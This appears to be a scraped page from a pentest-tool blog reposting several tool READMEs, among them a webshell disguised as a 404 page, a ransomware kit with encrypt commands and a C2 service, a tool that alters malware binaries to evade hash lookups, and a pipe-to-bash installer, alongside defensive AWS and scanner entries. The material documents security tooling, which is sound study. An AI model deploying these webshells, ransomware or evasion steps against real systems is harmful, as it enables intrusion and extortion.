Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

SecurityNotFound - 404 Page Not Found Webshell

$
0
0



Clone me!
Clone or download the project:
git clone https://github.com/CosasDePuma/SecurityNotFound.git SecurityNotFound
cd SecurityNotFound

"Installation"
The src/404.php file should be located on the target server.
That server must have the ability to execute .php files.
Here is an example of some of the most common routes on which servers are located:
# Windows (Xampp)
C:\Xampp\htdocs\

# Linux
/var/www/html/
Obviously, you and I know that you have legitimate access to that server.

Access Granted!

Now, you can access it through the browser:
https://www.target.com/404.php


You can replace the server 404 error template to access from any invalid URL.
To access the control panel, press TAB key or search the password field using your browser's tools.


The default password is: cosasdepuma.
You can leave the $passphrase variable in the script as an empty string to directly access the control panel. If it is your intention, you have lost my respect.
To set a custom value, insert your password into the $passphrase variable after applying the MD5 algorithm three consecutive times.

Control Panel







DumpsterFire - "Security Incidents In A Box!" A Modular, Menu-Driven, Cross-Platform Tool For Building Customized, Time-Delayed, Distributed Security Events

$
0
0

DumpsterFire Toolset - "Security Incidents In A Box!"
The DumpsterFire Toolset is a modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Turn paper tabletop exercises into controlled "live fire" range events. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
The toolset is designed to be dynamically extensible, allowing you to create your own Fires (event modules) to add to the included collection of toolset Fires. Just write your own Fire module and drop it into the FireModules directory. The DumpsterFire toolset will auto-detect your custom Fires at startup and make them available for use.

Author
Joe Gervais (TryCatchHCF)

Why
Red Teams and Blue Teams are typically overextended. What's missing is a way to scale each team's capabilites, providing more effective Red Team activity, and more realistic (and helpful) Blue Team / Purple Team exercises. Automation to the rescue! The DumpsterFire Toolset is a cross-platform menu-driven solution that allows you to easily create custom security incidents by combining modular, chained events into a consistent narrative. Those collections of events (DumpsterFires) can then be executed as time-delayed, automated processes. (They can also be triggered immediately, of course.)
The result? While you're in a meeting or out enjoying life, your DumpsterFire is waiting for its date-time trigger to activate. On a Red Team engagement, while you're busy exploiting that exposed service on a forgotten B2B server, your cloned & time-sychronized DumpsterFires are busy lighting up the target organization's SIEM on a far-away subnet, distracting their response team. Blue Teamers can turn table-top paper exercises into "live fire" range events, with controlled, pre-approved DumpsterFire event chains to trigger sensors and alerts, and train your analysts using their actual operational environment. Purple Team operations can now execute methodical, repeatable event chains to consistently map out their sensor and alerting posture. You can generate novel scenarios to test and train your teams, getting ahead of the threat space to be prepared for security contingencies.
Ever wondered how your Blue Team would respond to Mirai bot activity on your internal network? Now you can find out! (Don't worry, the Mirai bot Fire module doesn't pivot, but it does use the same usernames & passwords to brute-force telnet sessions across the target network.)
Don’t have a Red Team but wish you had an easy way to run controlled, repeatable, customized drills against all of your SOC shift teams? Done!
Wish you could support a Red Team engagement against a remote team that’s 7 timezones away, without waking up at 3:00am? Hit that snooze button!
Ever wanted to simultaneously rickroll all of your opponents’ systems during your annual cyberwarfare exercise? "Never gonna let you down!"
See sample DumpsterFires below. And of course the Shenanigans section.

Tutorial
See my CactusCon 2017 slides (included in project). The slides are written to stand on their own, providing background, approaches, specific use cases, and more. They'll put everything in context, and also won't put you to sleep. Unless they do put you to sleep, in which case you probably needed some rest anyway, so really we all come out ahead here.

Accountability
DumpsterFire creates a date-time stamped event log so that Red- and Blue teams can coordinate and track events, correlating them to what was detected (or not detected) by your sensors, which alerts did or did not trigger, etc. It also allows teams to confirm which events were part of your operation / exercise, keeping everyone out of trouble. All date-time tracking is performed in UTC, so your global operations can be easily correlated without worrying about conversions between timezones and international date lines.
The auto-generated date-time stamped event logs also provide an effortless value add to your engagements. Generate a collection of DumpsterFires for your client engagements, tailored to their attack surfaces. At the end of your operations you can hand over the logs as a bonus Purple Team deliverable to your client for post-engagement analysis.


Overview
The DumpsterFire toolset workflow is designed to be user-friendly and robust. Everything can be done from within the menu-driven dumpsterFireFactory.py script. Launch the script and the tool will guide you as you go. You can start by browsing the existing Fire modules and saved DumpsterFires. When you're ready to create your own DumpsterFires, the tool will lead you through the workflow to get the job done. Finally it will be time to ignite your DumpsterFire. After selecting the DumpsterFire of your choice, you'll review the DumpsterFire's Fire modules and settings. If everything looks good, light it up!
When you're building a DumpsterFire, after you've chosen all of the Fire modules you wish to include, the tool will loop through the list of Fires. If a Fire has options for custom settings, the tool will call that Fire's Configure() method to present you with prompts for its settings (e.g. a target network's IP address).
Once all of the Fires have been configured, you'll then be given the option to assign individual time delays to your Fires. This allows the DumpsterFire to better mimic real operations when executing its chain of events. For example, the first Fire may visit various hacking Websites, the next Fire then downloads a few common hacking tools before launching the third Fire which starts scanning the local network. If this all happened within seconds of each other, no SOC analyst is going to believe it was a human. By adding several minutes or even hours between those events, you create a more realistic chain of events.
After all of the Fires have been configured and optional individual Fire delays assigned, you'll be asked to name your DumpsterFire. Do not use spaces or odd special characterse, just stick to letters, numbers, underscores, and hyphens.
Voila! You have now created your first DumpsterFire. Time to light one up!
When you're ready to ignite a DumpsterFire, the tool will first show you the DumpsterFire's settings. If everything looks good, you'll be asked if you want to assign a date-time delay before igniting. All date-time processing is done in UTC to ensure consistent execution regardless of your DumpsterFire's location of execution. Otherwise you can decline the date-time delay and execution will begin immediately after you give final confirmation.
As the DumpsterFire executes, you'll be given regular date-time stamped feedback on each Fire's status and critical events. This not only helps you track progress, but also provides a chronological record of your DumpsterFire's activities - critical in coordinating and deconflicting your events from the general background noise that floods every SOC. You can also hand over the chronological record to your external clients after your operations are complete, as a value-added record of your activites that they can use to review their sensor and alert settings. All with no extra effort on your part.

Shenanigans
April 1st happens! So do cyber wargames or your best friend's birthday. Some circumstances call for a little extra something. Finally infiltrate your opponent's perimeter in that net wars competition? Celebrate with Shenanigans while locking in your victory! Best friend leave their screen unlocked on game night? Sharing is caring! DumpsterFire's Shenanigans let you add some flavor to your operation.
Want to open the system's default browser and stream all of that Rick Astley awesomeness? After setting their system volume to maximum? How about opening any URL you choose? Or setting the system's shell aliases to pretend the filesystem is corrupted?


Files & Directories
dumpsterFireFactory.py - Menu-driven tool for creating, configuring, scheduling, and executing DumpsterFires
FireModules/ - Directory that contains subdirectories of Fires, each subdirectory is a specific Category of Fires to keep your Fire modules organized. Fires are added to a DumpsterFire to create a chain of events and actions.
DumpsterFires/ - Directory containing your collection of DumpsterFires
igniteDumpsterFire.py - Headless script, invoked at command line with the filename of the DumpsterFire you wish to execute. Useful for igniting distributed DumpsterFires.
testFireModule.py - Utility script for unit testing the Class methods of your custom Fire modules, without the hassle of running through the entire DumpsterFire Factory process to debug. Also useful for running a single Fire to check your settings. testFireModule.py will prompt you for configuration settings were applicable.
__init__.py files - Required to make Python treat directories as containing Python packages, allows DumpsterFire toolset to find and load Fire modules.

Requirements
Python 2.7.x

Run DumpsterFire Factory
$ ./dumpsterFireFactory.py

Creating a DumpsterFire:
The menu-driven DumpsterFire Factory script guides you through each step, with context-appropriate help along the way.


Sample DumpsterFires
In our first example, we have a DumpsterFire that could be either a SOC drill or a Red Team distraction. The DumpsterFire first does a Google search for hacking tools. The next Fire opens Web sessions to various hacking Websites. Next, a following Fire downloads some common hacking tools. Then a port scan targets the subnetwork, followed by bruteforce login attempts against a single host via Telnet. The final Fire runs a series of Linux commands. Note that between each Fire, the creator of this DumpsterFire has inserted some time delays. This makes the flow of events appear more realistic.


In the next example, Purple Teamers have created a DumpsterFire to help analyze and validate their sensor and alerting configurations. This DumpsterFire runs a choreographed series of port scans, each targeting different collections of ports & services, with varying probe rates as well. They've inserted a 5 minute delay between each scanning Fire to simplify isolating the traffic associated with each scanning Fire. When they run this DumpsterFire, they'll also see date-timestamps at the beginning of each Fire to help them deconflict the Fire's network activity vs. other network events.


Customizing Your Dumpster Fires
DumpsterFire's modular design gives you flexibility to create any number of event-chain narratives. Fire modules that have configurable settings allow you to set target networks or system, etc. There are a few Fire modules, however, that give you immediate flexibility to greatly expand your DumpsterFire event sequences.
Without creating any new FireModule classes, you can use these existing "custom" Fire modules to leverage and extend your DumpsterFires:
  • FireModules/Websurfing/custom_url.py
  • FireModules/FileDownloads/download_custom_url.py
  • FireModules/OSCommand/os_linux_unix_command.py
  • FireModules/OSCommand/os_win_cmd_command.py
  • FireModules/OSCommand/os_win_powershell_script.py
  • FireModules/OSCommand/os_osx_applescript_command.py
You can add any number of these to your DumpsterFire, each with its own custom actions. For example, you could chain together a dozen 'custom_url.py' Fire modules to build a complete, tailored browsing narrative. You could then have various 'OSCommand/' Fire instances that execute system commands to further reinforce your desired narrative of events. The 'OSCommand/' Fires in particular give you incredible flexbility. Each individual Fire in your DumpsterFire event chain takes any shell commands that are appropriate for the host's OS:
Example: Linux/Unix (& OSX terminal)
find /home -name '*.bash_history' -exec cat {} ; ; echo "Never gonna give you up" > rickroll.txt ; wall rickroll.txt

Write Your Own Custom Fire Modules
DumpsterFire is ready to use out of the box, but it's real value is in how easily you can extend DumpsterFire's scenario toolchest by creating your own custom Fire modules. By creating and tailoring Fire modules to match your specific needs, you can quickly expand the types of DumpsterFire scenarios you can build and execute. Simply write your new Fire module and drop it into an existing directory under FireModules/ and the DumpsterFire toolset will automatically load it at runtime & make it available.
Want to keep your custom Fire modules completely separate in their own Category? Easy! Just create a new directory under FireModules/ and the DumpsterFire toolset will auto-detect and make it available as a new Category of Fires.
NOTE: Be sure your new directory has an empty file named __init__.py otherwise the Python package manager won't be able to find it, and DumpsterFire won't see it.


Your Fire module inherits from a class called FireModule. As a starting point, you can copy an existing Fire module. Be sure to change the filename and all classname references in the file to match your new Fire. (Update the Category path references in the class's constructor methods too, if needed.)
Required Class Methods:
Configure() - Prompts user for input, populates FireModule’s parameters
Description() - Return a string containing a description of the FireModule
GetParameters() - Returns a single string of Fire's parameters
SetParameters( string ) - Takes a single string & populates Fire's members
ActivateLogging( boolean ) - Sets flag for Fire to generate a log of its activities (great for review) NOTE: For initial release, logging to stdout is always on.
Ignite() - Executes Fire's actions

Utility Scripts
Testing Python classes can be annoying, especially when you want to unit test each of the class's methods, forcing you to slog through all the application's use cases to make sure each class method is executed in proper order. Bleh. So I've written and included a script that will properly invoke each method of your new FireModule-derived classes, enabling you to quickly churn-and-burn your way through debugging. You're welcome. :-) Also a great way to run a Fire by itself to test your settings, see what it does, etc.
At the command line, give the testFireModule.py script the relative filepath to your custom Fire module. The test script will call each of the required FireModule methods for you, in proper sequence (getting configuration prior to saving, etc.). The test script doesn't use exception handling, because Python only gives you useful errors (like pointing out that missing double-quote) when it crashes. Crash and burn your way to a successful custom Fire!


Syhunt Community 6.7 - Web And Mobile Application Scanner

$
0
0

Syhunt Community is a web and now mobile application security scanner. Syhunt is able to scan any kind of application source code for potential security vulnerabilities, pinpointing the exact lines of the code that need to be patched. Or you can simply enter a start URL and get detailed vulnerability information - Syhunt is also composed by a deep crawler able to fully map a website structure and an automated injector able to adapt, mutate, analyze and test the web application response to thousands of different web attacks.

CHANGELOG VERSION 6.7 (SEPTEMBER 17, 2019)
* Added SAST support and checks for mobile (iOS and Android) apps. This includes support for the programming languages Objective-C, C, C++ and Swift.
* Added many new and improved SAST checks for Java.
* Improved code vulnerability detection accuracy and vulnerable line detection precision.
* Improved insecure randomness checks (additional checks) in Syhunt Code.
* Improved multi-language source code parsing.
* Improved automated web form login (alternative schemes) in Syhunt Dynamic.
* Improved spidering of heavily dynamically generated web stores.
* Minor optimizations for Wordpress-based websites in Syhunt Dynamic.
* Additional entry point coverage and input filtering/validation analysis in Syhunt Code.
* Allow to ignore specific vulnerabilities in Site Preferences and Code Scanner Preferences screen.
* Improved session status and icons in session manager.
* Fixed a few bugs and false positives:
- GIT for Windows 64-bit not being detected by Syhunt Code.
- Improved hardcoded resource checks (eliminating some common false positives) in Syhunt Code.
- Improved insecure salting checks (fixed two false positive cases) in Syhunt Code.
- Fixed: an overly-broad path rejection rule in spider.
- Make user check preferences overwrite hunt method check preferences in both Syhunt Dynamic and Syhunt Code.
- Error message involving options table when trying to add target to the Dynamic Target list.


Terraform AWS Secure Baseline - Terraform Module To Set Up Your AWS Account With The Secure Baseline Configuration Based On CIS Amazon Web Services Foundations

$
0
0

Terraform Module Registry
A terraform module to set up your AWS account with the reasonably secure configuration baseline. Most configurations are based on CIS Amazon Web Services Foundations v1.2.0.
See Benchmark Compliance to check which items in CIS benchmark are covered.
Starting from v0.10.0, this module requires Terraform v0.12 or later. Please use v0.9.0 if you need to use Terraform v0.11 or ealier.

Features

Identity and Access Management
  • Set up IAM Password Policy.
  • Create separated IAM roles for defining privileges and assigning them to entities such as IAM users and groups.
  • Create an IAM role for contacting AWS support for incident handling.
  • Enable AWS Config rules to audit root account status.

Logging & Monitoring
  • Enable CloudTrail in all regions and deliver events to CloudWatch Logs.
  • CloudTrail logs are encrypted using AWS Key Management Service.
  • All logs are stored in the S3 bucket with access logging enabled.
  • Logs are automatically archived into Amazon Glacier after the given period(defaults to 90 days).
  • Set up CloudWatch alarms to notify you when critical changes happen in your AWS account.
  • Enable AWS Config in all regions to automatically take configuration snapshots.
  • Enable SecurityHub and subscribe CIS benchmark standard.

Networking
  • Remove all rules associated with default route tables, default network ACLs and default security groups in the default VPC in all regions.
  • Enable AWS Config rules to audit unrestricted common ports in Security Group rules.
  • Enable VPC Flow Logs with the default VPC in all regions.
  • Enable GuardDuty in all regions.

Usage
data "aws_caller_identity" "current" {}
data "aws_region" "current" {}

module "secure_baseline" {
source = "nozaq/secure-baseline/aws"

audit_log_bucket_name = "YOUR_BUCKET_NAME"
aws_account_id = data.aws_caller_identity.current.account_id
region = data.aws_region.current.name
support_iam_role_principal_arn = "YOUR_IAM_USER"

providers = {
aws = aws
aws.ap-northeast-1 = aws.ap-northeast-1
aws.ap-northeast-2 = aws.ap-northeast-2
aws.ap-south-1 = aws.ap-south-1
aws.ap-southeast-1 = aws.ap-southeast-1
aws.ap-southeast-2 = aws.ap-southeast-2
aws.ca-central-1 = aws.ca-central-1
aws.eu-central-1 = aws.eu-central-1
aws.eu-north-1 = aws.eu-north-1
aws.eu-west-1 = aws.eu-west-1
aws.eu-west-2 = aws.eu-west-2
aws.eu-west-3 = aws.eu-west-3
aws.sa-east-1 = aws.sa-east-1
aws.us-east-1 = aws.us-east-1
aws.us-east-2 = aws.us-east-2
aws.us-west-1 = aws.us-west-1
aws.us-west-2 = aws.us-west-2
}
}
Check the example to understand how these providers are defined. Note that you need to define a provider for each AWS region and pass them to the module. Currently this is the recommended way to handle multiple regions in one module. Detailed information can be found at Providers within Modules - Terraform Docs.
A new S3 bucket to store audit logs is automatically created by default, while the external S3 bucket can be specified. It is useful when you already have a centralized S3 bucket to store all logs. Please see external-bucket example for more detail.

Managing multiple accounts in AWS Organization
When you have multiple AWS accounts in your AWS Organization, secure-baseline module configures the separated environment for each AWS account. You can change this behavior to centrally manage security information and audit logs from all accounts in one master account. Check organization example for more detail.

Submodules
This module is composed of several submodules and each of which can be used independently. Modules in Package Sub-directories - Terraform describes how to source a submodule.

Inputs
NameDescriptionTypeDefaultRequired
account_typeThe type of the AWS account. The possible values are individual, master and member . Specify master and member to set up centalized logging for multiple accounts in AWS Organization. Use individual` otherwise.string"individual"no
alarm_namespaceThe namespace in which all alarms are set up.string"CISBenchmark"no
alarm_sns_topic_nameThe name of the SNS Topic which will be notified when any alarm is performed.string"CISAlarm"no
allow_users_to_change_passwordWhether to allow users to change their own password.string"true"no
audit_log_bucket_force_destroyA boolean that indicates all objects should be deleted from the audit log bucket so that the bucket can be destroyed without error. These objects are not recoverable.string"false"no
audit_log_bucket_nameThe name of the S3 bucket to store various audit logs.stringn/ayes
audit_log_lifecycle_glacier_transition_daysThe number of days after log creation when the log file is archived into Glacier.string"90"no
aws_account_idThe AWS Account ID number of the account.stringn/ayes
cloudtrail_cloudwatch_logs_group_nameThe name of CloudWatch Logs group to which CloudTrail events are delivered.string"cloudtrail-multi-region"no
cloudtrail_iam_role_nameThe name of the IAM Role to be used by CloudTrail to delivery logs to CloudWatch Logs group.string"CloudTrail-CloudWatch-Delivery-Role"no
cloudtrail_iam_role_policy_nameThe name of the IAM Role Policy to be used by CloudTrail to delivery logs to CloudWatch Logs group.string"CloudTrail-CloudWatch-Delivery-Policy"no
cloudtrail_key_deletion_window_in_daysDuration in days after which the key is deleted after destruction of the resource, must be between 7 and 30 days. Defaults to 30 days.string"10"no
cloudtrail_nameThe name of the trail.string"cloudtrail-multi-region"no
cloudtrail_s3_key_prefixThe prefix used when CloudTrail delivers events to the S3 bucket.string"cloudtrail"no
cloudwatch_logs_retention_in_daysNumber of days to retain logs for. CIS recommends 365 days. Possible values are: 0, 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, and 3653. Set to 0 to keep logs indefinitely.string"365"no
config_aggregator_nameThe name of the organizational AWS Config Configuration Aggregator.string"organization-aggregator"no
config_aggregator_name_prefixThe prefix of the name for the IAM role attached to the organizational AWS Config Configuration Aggregator.string"config-for-organization-role"no
config_delivery_frequencyThe frequency which AWS Config sends a snapshot into the S3 bucket.string"One_Hour"no
config_iam_role_nameThe name of the IAM Role which AWS Config will use.string"Config-Recorder"no
config_iam_role_policy_nameThe name of the IAM Role Policy which AWS Config will use.string"Config-Recorder-Policy"no
config_s3_bucket_key_prefixThe prefix used when writing AWS Config snapshots into the S3 bucket.string"config"no
config_sns_topic_nameThe name of the SNS Topic to be used to notify configuration changes.string"ConfigChanges"no
guardduty_disable_email_notificationBoolean whether an email notification is sent to the accounts.string"false"no
guardduty_finding_publishing_frequencySpecifies the frequency of notifications sent for subsequent finding occurrences.string"SIX_HOURS"no
guardduty_invitation_messageMessage for invitation.string"This is an automatic invitation message from guardduty-baseline module."no
manager_iam_role_nameThe name of the IAM Manager role.string"IAM-Manager"no
manager_iam_role_policy_nameThe name of the IAM Manager role policy.string"IAM-Manager-Policy"no
master_account_idThe ID of the master AWS account to which the current AWS account is associated. Required if account\_type is member.string""no
master_iam_role_nameThe name of the IAM Master role.string"IAM-Master"no
master_iam_role_policy_nameThe name of the IAM Master role policy.string"IAM-Master-Policy"no
max_password_ageThe number of days that an user password is valid.string"90"no
member_accountsA list of IDs and emails of AWS accounts which associated as member accounts.object[]no
minimum_password_lengthMinimum length to require for user passwords.string"14"no
password_reuse_preventionThe number of previous passwords that users are prevented from reusing.string"24"no
regionThe AWS region in which global resources are set up.stringn/ayes
require_lowercase_charactersWhether to require lowercase characters for user passwords.string"true"no
require_numbersWhether to require numbers for user passwords.string"true"no
require_symbolsWhether to require symbols for user passwords.string"true"no
require_uppercase_charactersWhether to require uppercase characters for user passwords.string"true"no
support_iam_role_nameThe name of the the support role.string"IAM-Support"no
support_iam_role_policy_nameThe name of the support role policy.string"IAM-Support-Role"no
support_iam_role_principal_arnThe ARN of the IAM principal element by which the support role could be assumed.stringn/ayes
tagsSpecifies object tags key and value. This applies to all resources created by this module.map{ "Terraform": true }no
use_external_audit_log_bucketA boolean that indicates whether the specific audit log bucket already exists. Create a new S3 bucket if it is set to false.string"false"no
vpc_iam_role_nameThe name of the IAM Role which VPC Flow Logs will use.string"VPC-Flow-Logs-Publisher"no
vpc_iam_role_policy_nameThe name of the IAM Role Policy which VPC Flow Logs will use.string"VPC-Flow-Logs-Publish-Policy"no
vpc_log_group_nameThe name of CloudWatch Logs group to which VPC Flow Logs are delivered.string"default-vpc-flow-logs"no
vpc_log_retention_in_daysNumber of days to retain logs for. CIS recommends 365 days. Possible values are: 0, 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, and 3653. Set to 0 to keep logs indefinitely.string"365"no

Outputs
NameDescription
alarm_sns_topicThe SNS topic to which CloudWatch Alarms will be sent.
audit_bucketThe S3 bucket used for storing audit logs.
cloudtrailThe trail for recording events in all regions.
cloudtrail_kms_keyThe KMS key used for encrypting CloudTrail events.
cloudtrail_log_delivery_iam_roleThe IAM role used for delivering CloudTrail events to CloudWatch Logs.
cloudtrail_log_groupThe CloudWatch Logs log group which stores CloudTrail events.
config_configuration_recorderThe configuration recorder in each region.
config_iam_roleThe IAM role used for delivering AWS Config records to CloudWatch Logs.
config_sns_topicThe SNS topic that AWS Config delivers notifications to.
default_network_aclThe default network ACL.
default_route_tableThe default route table.
default_security_groupThe ID of the default security group.
default_vpcThe default VPC.
guardduty_detectorThe GuardDuty detector in each region.
manager_iam_roleThe IAM role used for the manager user.
master_iam_roleThe IAM role used for the master user.
support_iam_roleThe IAM role used for the support user.
vpc_flow_logs_groupThe CloudWatch Logs log group which stores VPC Flow Logs in each region.
vpc_flow_logs_iam_roleThe IAM role used for delivering VPC Flow Logs to CloudWatch Logs.


Recomposer - Randomly Changes Win32/64 PE Files For 'Safer' Uploading To Malware And Sandbox Sites

$
0
0

Ever have that not so safe feeling uploading your malware binaries to VirusTotal or other AV sites because you can look up binaries by hashes? (Example: https://github.com/mubix/vt-notify)
Feel somewhat safer with Recomposer!*
Recomposer will take your binary and randomly do the following:
  • Change the file name
  • Change the section names
  • Change the section flags
  • Injection random number of five different types of nops into each available code cave over 20 bytes in length

By the way, your file will still execute, so upload away!*
Supports win32/64 PE Files!!
Two modes:
  • Manual: Works like a PE Editor, change section names and flags
  • Auto: Randomly changes the binary
Tested by creating 11200 samples from one binary. Results:
  • No hash collisions
  • ssdeep matching percentage to the original file ranged from 94% to 77%

Usage:

Auto Mode:
./recomposer.py -f live.sysinternals.com/Tcpview.exe -a
Old file name: live.sysinternals.com/Tcpview.exe
New file name: zYmycO4NO2LYW.exe
[*] Checking if binary is supported
[*] Gathering file info
1 Section: .text | SectionFlags: 0x60000020
2 Section: .rdata | SectionFlags: 0x40000040
3 Section: .data | SectionFlags: 0xc0000040
4 Section: .rsrc | SectionFlags: 0x40000040
[*] Changing Section .text Name
[*] Changing Section .rdata Name
[*] Changing Section .data Flags
[*] Changing Section .data Name
[*] Changing Section .rsrc Name
Updated Binary:
updatedfile/zYmycO4NO2LYW.exe
[*] Checking if binary is supported
[*] Gathering file info
1 Section: .mhz | SectionFlags: 0x60000020
2 Section: .p1k | SectionFlags: 0x40000040
3 Section: .FSr0U | SectionFlags: 0xd0000443
4 Section: .q2X | SectionFlags: 0x40000040
Writing to log_recomposer.txt
You might see this warning:
[!] Warning, .text section hash is not changed!
[!] No caves available for nop injection.
Which means that the .text section hash will be the same as the original file and be searchable (on the web) once google indexes the VT results (if you upload the file of course). If this happens, upx encoding the recomposed file should take care of that problem (unless the file is already upx encoded).
After recomposer completes, your file will be in the updatedfile directory. Feel free to upload it to your favorite malware sandbox service!

Manual Mode:
A simple PE Editor:
./recomposer.py -f live.sysinternals.com/Tcpview.exe -m
[*] Checking if binary is supported
[*] Gathering file info
[?] What sections would you like to change:
1 Section: .text | SectionFlags: 0x60000020
2 Section: .rdata | SectionFlags: 0x40000040
3 Section: .data | SectionFlags: 0xc0000040
4 Section: .rsrc | SectionFlags: 0x40000040
Section number:1
[-] You picked the .text section.
[?] Would you like to (A) change the section name or (B) the section flags? b
[-] You picked: b
=========================
[*] Current attributes:
.text | 0x60000020
[-] IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_EXECUTE
[-] IMAGE_SCN_CNT_CODE
=========================
[*] Commands 'zero' out the flags, 'help', 'write', or ('exit', 'quit', 'q', 'done')
[*] Use 'write' to commit your changes or 'clear' to start over.
[?] Enter an attribute to add or type 'help' or 'exit':
[...]
Just follow the menu and your results will be in updatedfile directory as change.filename.exe or whatever the output you chose when using the -o flag.
If you are confused about where your files are, just look at log_recomposer.txt for location and hashes of files changed:
filename|filename_hash|changedfile|changedfile_hash

psinfo.exe|ae1554f2c1b1454a91c5610747603824|updatedfile/8dV5.exe|791ff4d4b2010accebc718afda58f83a
psexec.exe|d0df366711c8b296680002840336b6fd|updatedfile/udi6ieIVFi.exe|6fafa108d697a46a271a918436e60cd5
live.sysinternals.com/Tcpview.exe|9aa5a93712c584acdcaa7eef9d25ef4d|updatedfile/zYmycO4NO2LYW.exe|fd984b833443c457668a480a37cf9904
live.sysinternals.com/Tcpview.exe|9aa5a93712c584acdcaa7eef9d25ef4d|updatedfile/change.Tcpview.exe|c43eeec089a3e4f9e6fd0218a27ca4c2
*Recomposer does not stop malware from notifying the malware owner of their binary running outside of an expected environment.**
**I.E.: Your environment.***
***But if you don't care, go for it!


CryptonDie - A Ransomware Developed For Study Purposes

$
0
0

CryptonDie is a ransomware developed for study purposes.

Options
    --key       key used to encrypt and decrypt files, default is random string(recommended)      --dir       Home directory for the attack, default is /      --encrypt   Encrypt all files      --decrypt   Decrypt all files      --verbose   Active verbose mode, default is False    Example:      python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose    

Web service endpoints
    --key       key used to encrypt and decrypt files, default is random string(recommended)
--dir Home directory for the attack, default is /
--encrypt Encrypt all files
--decrypt Decrypt all files
--verbose Active verbose mode, default is False

Example:
python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose

How to run this shit?

Clonning repository
GET   - /targets              - list all targets (returns in JSON format)
GET - /targets/<target_id> - list one target by id (returns in JSON format)
POST - /target/<target_id> - create new target

Install requirements
git clone https://github.com/zer0dx/cryptondie

Running web service
pip3 install -r requirements.txt

Running in Docker
cd cryptondie/discovery
python3 service_discovery.py

which encryption is implemented?
Advanced Encryption Standard  

Contact
[+] Telegram:   @zer0dx  [+] Github:     https://github.com/zer0dx  [+] Twitter:    https://twitter.com/zer0dxx  [+] Blog:       https://zer0dx.github.io  
chaos is order yet undeciphered.


Sub.Sh - Online Subdomain Detect Script

$
0
0
Online Subdomain Detect Script.

USAGE 

Script
bash sub.sh webscantest.com 
./sub.sh webscantest.com


Curl
curl -s -L https://raw.githubusercontent.com/cihanmehmet/sub.sh/master/sub.sh | bash -s webscantest.com


Subdomain Alive Check
bash sub_alive.sh bing.com
curl -s -L https://raw.githubusercontent.com/cihanmehmet/sub.sh/master/sub_alive.sh | bash -s bing.com"
‼️fping required


Nmap -sn (No port scan) scan live IP detection script

fping -f ip.txt

Usage bash nmap_sn.sh ip.txt


#!/bin/bash

nmap -sn -iL $1 |grep "Nmap scan report for"|grep -Eo "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|sort -u |tee $1.txt

echo "Detect IP $(wc -l $1.txt|awk '{ print $1 }' )" "=> result_${1}" "saved"
echo "File Location : "$(pwd)/"result_$1"



Lockdoor Framework - A Penetration Testing Framework With Cyber Security Resources

$
0
0

Lockdoor Framework : A Penetration Testing Framework With Cyber Security Resources.


09/2019 : 1.0Beta
  • Information Gathring Tools (21)
  • Web Hacking Tools(15)
  • Reverse Engineering Tools (15)
  • Exploitation Tools (6)
  • Pentesting & Security Assessment Findings Report Templates (6)
  • Password Attack Tools (4)
  • Shell Tools + Blackarch's Webshells Collection (4)
  • Walk Throughs & Pentest Processing Helpers (3)
  • Encryption/Decryption Tools (2)
  • Social Engineering tools (1)
  • All you need as Privilege Escalation scripts and exploits
  • Working on Kali,Ubuntu,Arch,Fedora,Opensuse and Windows (Cygwin)



09/2019 : 0.6
  • Information Gathring tools (13)
  • Web Hacking Tools (9)
  • Working on Kali,Ubuntu,Arch,Fedora,Opensuse and Windows (Cygwin)
  • Some bugs That I'm fixing with time so don't worry about that.



Check the Wiki Pages to know more about the tool





Overview
LockDoor is a Framework aimed at helping penetration testers, bug bounty hunters And cyber security engineers. This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters. As pentesters, most of us has his personal ' /pentest/ ' directory so this Framework is helping you to build a perfect one. With all of that ! It automates the Pentesting process to help you do the job more quickly and easily.


Features
Added value : (what makes it different from other frameworks).

Pentesting Tools Selection:
  • Tools ?: Lockdoor doesn't contain all pentesting tools (Added value) , let's be honest ! Who ever used all the Tools you find on all those Penetration Testing distributions ? Lockdoor contains only the favorite (Added value) and the most used toolsby Pentesters (Added value).
  • what Tools ?: the tools contains Lockdoor are a collection from the best tools (Added value) on Kali,Parrot Os and BlackArch. Also some private tools (Added value) from some other hacking teams (Added value) like InurlBr, iran-cyber. Without forgeting some cool and amazing tools I found on Github made by some perfect human beigns (Added value).
  • Easy customization: Easily add/remove tools. (Added value)
  • Installation: You can install the tool automatically using the installer.sh , Manually or on Docker [COMING SOON]

Resources and cheatsheets: (Added value)
  • Resources: That's what makes Lockdoor Added value, Lockdoor Doesn't contain only tools ! Pentesing and Security Assessment Findings Reports templates (Added value) , Pentesting walkthrough examples and tempales (Added value) and more.
  • Cheatsheets: Everyone can forget something on processing or a tool use, or even some trciks. Here comes the Cheatsheets (Added value) role ! there are cheatsheets about everything, every tool on the framework and any enumeration,exploitation and post-exploitation techniques.

Installation:
  • Automatically
    git clone https://github.com/SofianeHamlaoui/Lockdoor-Framework.git && cd Lockdoor-Framework
    chmod +x ./install.sh
    ./install.sh
  • Manually
    • Installing requirments
      python python-pip python-requests python2 python2-pip gcc ruby php git wget bc curl netcat subversion jre-openjdk make automake gcc linux-headers gzip
    • Installing Go
      wget https://dl.google.com/go/go1.13.linux-amd64.tar.gz
      tar -xvf go1.13.linux-amd64.tar.gz
      mv go /usr/local
      export GOROOT=/usr/local/go
      export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
      rm go1.13.linux-amd64.tar.gz
    • Installing Lockdoor
      # Clonnig
      git clone https://github.com/SofianeHamlaoui/Lockdoor-Framework.git && cd Lockdoor-Framework
      # Create the config file
